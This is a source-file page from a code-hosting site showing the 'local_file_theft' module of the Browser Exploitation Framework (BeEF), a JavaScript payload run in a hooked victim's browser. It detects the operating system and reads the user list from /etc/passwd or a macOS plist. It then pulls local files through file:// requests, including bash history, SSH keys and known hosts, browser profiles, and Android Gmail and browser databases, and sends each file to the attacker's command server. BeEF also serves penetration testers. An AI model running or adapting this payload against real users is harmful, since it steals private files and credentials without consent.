Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
4ec6ecee2712960a2de68663329857e75a366766
beef/modules/misc/local_file_theft/command.js

251 lines
7.7 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// local_file_theft
//
// Shamelessly plagurised from kos.io/xsspwn
beef.execute(function() {
result = '';
fileList = ['linux','mac','ios','android','windows']
fileList['linux']= {
// How do we discover users?
"discover" :'/etc/passwd',
// Okay, we found them, what do we pillage?
"post" :{
'bashHistory':'.bash_history',
'sshHosts':'.ssh/known_hosts',
'sshKeys':'.ssh/id_rsa.pub',
'firefoxProfiles':'.mozilla/firefox/profiles.ini',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['mac']= {
// How do we discover users?
"discover" :'/Library/Preferences/com.apple.loginwindow.plist',
// Okay, we found them, what do we pillage?
"post" :{
'bashHistory':'.bash_history',
'sshHosts':'.ssh/known_hosts',
'sshKeys':'.ssh/id_rsa.pub',
'firefoxProfiles':'.mozilla/firefox/profiles.ini',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['android']= {
// Instead of how, just figure out the currently in use appi
"discover" :'/proc/self/status',
// Okay, we found them, what do we pillage?
"post" :{
'browser_data':'/data/data/com.android.browser/databases/webview.db',
'browser_data2':'/data/data/com.android.browser/databases/browser.db',
'gmail_accounts':'/data/data/com.google.android.gm/shared_prefs/Gmail.xml',
'dolpin_data':'/data/data/mobi.mgeek.TunnyBrowser/databases/webview.db',
'dolpin_data2':'/data/data/mobi.mgeek.TunnyBrowser/databases/browser.db',
'chromeBookmarks':'.config/chromium/Default/Bookmarks'
}
}
fileList['ios']= {
// WHAT IS THIS I DON'T EVEN
"discover" :'',
"post" :{
'iPadEtcHosts':'/etc/hosts'
}
}
fileList['windows']= {
// Meh, who cares
"discover" :'',
"post" :{
'bootini':'/c:/boot.ini',
'hosts':'/c:/WINDOWS/system32/drivers/etc/hosts'
}
}
fileList['custom']= {
// user defined
"discover" :'',
"post" :{
'result':'<%== @target_file %>',
}
}
functionList = {
mac:{
// OS X disovery
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',"file:///"+fileList['mac']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
// TODO
// Understand plist format to _reliably_ pull out username with regex
//user = tmp.responseText.match(/\x03\x57(.*)\x12/)[1];
user = tmp.responseText.match(/\x54(.*)\x12\x01/)[1];
homedir = "/Users/"+user+"/";
grabFiles(homedir,"mac")
}
}
return true;
}
},
linux:{
// Linux username discovery
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',"file:///"+fileList['linux']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
userDir = tmp.responseText.match(/[a-z0-9]*:x:[0-9]{4}:[0-9]{4}:[^:]*:([^:]*)/)[1];
homedir = userDir+"/";
grabFiles(homedir,"linux")
}
}
return true;
}
},
ios:{
// Grab ipad stuff
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',fileList['ios']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
homedir = "file:///";
grabFiles(homedir,"ios")
}
}
return true;
}
},
custom:{
// Grab custom stuff
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',fileList['custom']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
homedir = "file:///";
grabFiles(homedir,"custom")
}
}
return true;
}
},
android:{
// figure out what app (gmail, browser, or dolphin?) android
discover : function(){
//document.location="http://kos.io/"
tmp = new XMLHttpRequest()
tmp.open('get',fileList['android']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
if(/.*android\.gm.*/.test(tmp.responseText)){
document.location="http://kos.io/gmail"
} else if(/.*android\.browser.*/.test(tmp.responseText)){
document.location="http://kos.io/browser"
} else if(/.*ek\.TunnyBrowser.*/.test(tmp.responseText)){
document.location="http://kos.io/dolphin"
}
grabFiles("/","android")
}
}
return true;
}
}
}
function identify(){
// custom file is specified
if ('<%== @target_file %>' != 'autodetect') {
return "custom"
// determine a good file to steal based on platform
} else {
if(/.*Android.*/.test(navigator.userAgent)){
return "android"
} else if(/Linux.*/i.test(navigator.platform)){
return "linux"
} else if(/iP.*/i.test(navigator.platform)){
return "ios"
} else if(/.*Mac.*/i.test(navigator.userAgent)){
return "mac"
} else if(/.*Windows.*/i.test(navigator.userAgent)){
return "windows"
} else if(/.*hpwOS.*/i.test(navigator.platform)){
return "webos"
}
}
}
function discoverUsers(os){
return functionList[os]['discover']()
}
function grabFiles(dir,os){
tmpfile = {}
for (i in fileList[os]['post']){
beef.debug('dir = ' + dir);
beef.debug('fileList: ' + fileList[os]['post'][i]);
beef.debug(i);
tmpfile[i] = new XMLHttpRequest()
tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
tmpfile[i].send();
tmpfile[i].onreadystatechange=function(){
for (j in fileList[os]['post']){
if(tmpfile[j].readyState==4){
beef.debug('new returned for: ' + j);
result = j +": "+ tmpfile[j].responseText;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
}
}
}
}
}
discoverUsers(identify());
});
Reference in New Issue View Git Blame Copy Permalink